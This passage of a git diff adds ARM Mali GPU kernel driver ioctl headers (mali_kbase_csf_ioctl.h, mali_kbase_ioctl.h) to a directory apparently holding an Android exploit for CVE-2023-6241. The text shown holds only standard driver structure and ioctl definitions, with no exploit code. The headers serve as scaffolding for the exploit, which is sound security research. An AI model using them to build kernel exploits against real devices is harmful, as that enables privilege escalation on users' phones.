address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * @ex_offset_var_addr: GPU address of the trace buffer write offset variable + * @ex_buffer_base: Trace buffer GPU base address for the queue + * @ex_buffer_size: Size of the trace buffer in bytes + * @ex_event_size: Trace event write size, in log2 designation + * @ex_event_state: Trace event states configuration + * @ex_padding: Currently unused, must be zero + * + * Note: There is an identical sub-section at the start of this struct to that + * of @ref kbase_ioctl_cs_queue_register. Any change of this sub-section + * must also be mirrored to the latter. Following the said sub-section, + * the remaining fields forms the extension, marked with ex_*. + */ +struct kbase_ioctl_cs_queue_register_ex { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; + __u64 ex_offset_var_addr; + __u64 ex_buffer_base; + __u32 ex_buffer_size; + __u8 ex_event_size; + __u8 ex_event_state; + __u8 ex_padding[2]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER_EX \ + _IOW(KBASE_IOCTL_TYPE, 40, struct kbase_ioctl_cs_queue_register_ex) + +/** + * struct kbase_ioctl_cs_queue_terminate - Terminate a GPU command queue + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_terminate { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 41, struct kbase_ioctl_cs_queue_terminate) + +/** + * union kbase_ioctl_cs_queue_group_create_1_6 - Create a GPU command queue + * group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create_1_6 { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 padding[3]; + + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE_1_6 \ + _IOWR(KBASE_IOCTL_TYPE, 42, union kbase_ioctl_cs_queue_group_create_1_6) + +/** + * union kbase_ioctl_cs_queue_group_create - Create a GPU command queue group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.csi_handlers: Flags to signal that the application intends to use CSI + * exception handlers in some linear buffers to deal with + * the given exception types. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 csi_handlers; + __u8 padding[2]; + /** + * @in.reserved: Reserved + */ + __u64 reserved; + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE \ + _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create) + +/** + * struct kbase_ioctl_cs_queue_group_term - Terminate a GPU command queue group + * + * @group_handle: Handle of the queue group to be terminated + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_cs_queue_group_term { + __u8 group_handle; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 43, struct kbase_ioctl_cs_queue_group_term) + +#define KBASE_IOCTL_CS_EVENT_SIGNAL \ + _IO(KBASE_IOCTL_TYPE, 44) + +typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */ + +/** + * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue + * + * @id: ID of the new command queue returned by the kernel + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_new { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_CREATE \ + _IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new) + +/** + * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue + * + * @id: ID of the command queue to be destroyed + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_delete { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_DELETE \ + _IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete) + +/** + * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue + * + * @addr: Memory address of an array of struct base_kcpu_queue_command + * @nr_commands: Number of commands in the array + * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_enqueue { + __u64 addr; + __u32 nr_commands; + base_kcpu_queue_id id; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \ + _IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue) + +/** + * union kbase_ioctl_cs_tiler_heap_init - Initialize chunked tiler memory heap + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @in.buf_desc_va: Buffer descriptor GPU VA for tiler heap reclaims. + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + __u64 buf_desc_va; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init) + +/** + * union kbase_ioctl_cs_tiler_heap_init_1_13 - Initialize chunked tiler memory heap, + * earlier version upto 1.13 + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init_1_13 { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT_1_13 \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init_1_13) + +/** + * struct kbase_ioctl_cs_tiler_heap_term - Terminate a chunked tiler heap + * instance + * + * @gpu_heap_va: GPU VA of Heap context that was set up for the heap. + */ +struct kbase_ioctl_cs_tiler_heap_term { + __u64 gpu_heap_va; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_TERM \ + _IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term) + +/** + * union kbase_ioctl_cs_get_glb_iface - Request the global control block + * of CSF interface capabilities + * + * @in: Input parameters + * @in.max_group_num: The maximum number of groups to be read. Can be 0, in + * which case groups_ptr is unused. + * @in.max_total_stream_num: The maximum number of CSs to be read. Can be 0, in + * which case streams_ptr is unused. + * @in.groups_ptr: Pointer where to store all the group data (sequentially). + * @in.streams_ptr: Pointer where to store all the CS data (sequentially). + * @out: Output parameters + * @out.glb_version: Global interface version. + * @out.features: Bit mask of features (e.g. whether certain types of job + * can be suspended). + * @out.group_num: Number of CSGs supported. + * @out.prfcnt_size: Size of CSF performance counters, in bytes. Bits 31:16 + * hold the size of firmware performance counter data + * and 15:0 hold the size of hardware performance counter + * data. + * @out.total_stream_num: Total number of CSs, summed across all groups. + * @out.instr_features: Instrumentation features. Bits 7:4 hold the maximum + * size of events. Bits 3:0 hold the offset update rate. + * (csf >= 1.1.0) + * + */ +union kbase_ioctl_cs_get_glb_iface { + struct { + __u32 max_group_num; + __u32 max_total_stream_num; + __u64 groups_ptr; + __u64 streams_ptr; + } in; + struct { + __u32 glb_version; + __u32 features; + __u32 group_num; + __u32 prfcnt_size; + __u32 total_stream_num; + __u32 instr_features; + } out; +}; + +#define KBASE_IOCTL_CS_GET_GLB_IFACE \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_ioctl_cs_get_glb_iface) + +struct kbase_ioctl_cs_cpu_queue_info { + __u64 buffer; + __u64 size; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_CS_CPU_QUEUE_DUMP \ + _IOW(KBASE_IOCTL_TYPE, 53, struct kbase_ioctl_cs_cpu_queue_info) + +/** + * union kbase_ioctl_mem_alloc_ex - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @in.fixed_address: The GPU virtual address requested for the allocation, + * if the allocation is using the BASE_MEM_FIXED flag. + * @in.extra: Space for extra parameters that may be added in the future. + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc_ex { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + __u64 fixed_address; + __u64 extra[3]; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC_EX _IOWR(KBASE_IOCTL_TYPE, 59, union kbase_ioctl_mem_alloc_ex) + +/** + * union kbase_ioctl_read_user_page - Read a register of USER page + * + * @in: Input parameters. + * @in.offset: Register offset in USER page. + * @in.padding: Padding to round up to a multiple of 8 bytes, must be zero. + * @out: Output parameters. + * @out.val_lo: Value of 32bit register or the 1st half of 64bit register to be read. + * @out.val_hi: Value of the 2nd half of 64bit register to be read. + */ +union kbase_ioctl_read_user_page { + struct { + __u32 offset; + __u32 padding; + } in; + struct { + __u32 val_lo; + __u32 val_hi; + } out; +}; + +#define KBASE_IOCTL_READ_USER_PAGE _IOWR(KBASE_IOCTL_TYPE, 60, union kbase_ioctl_read_user_page) + +#endif /* _UAPI_KBASE_CSF_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h new file mode 100644 index 0000000..9eaa83c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h @@ -0,0 +1,894 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2017-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_IOCTL_H_ +#define _UAPI_KBASE_IOCTL_H_ + +#ifdef __cpluscplus +extern "C" { +#endif + +#include +#include + +#include "mali_kbase_csf_ioctl.h" + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. + */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_cinstr_gwt_dump - Used to collect all GPU write fault + * addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for 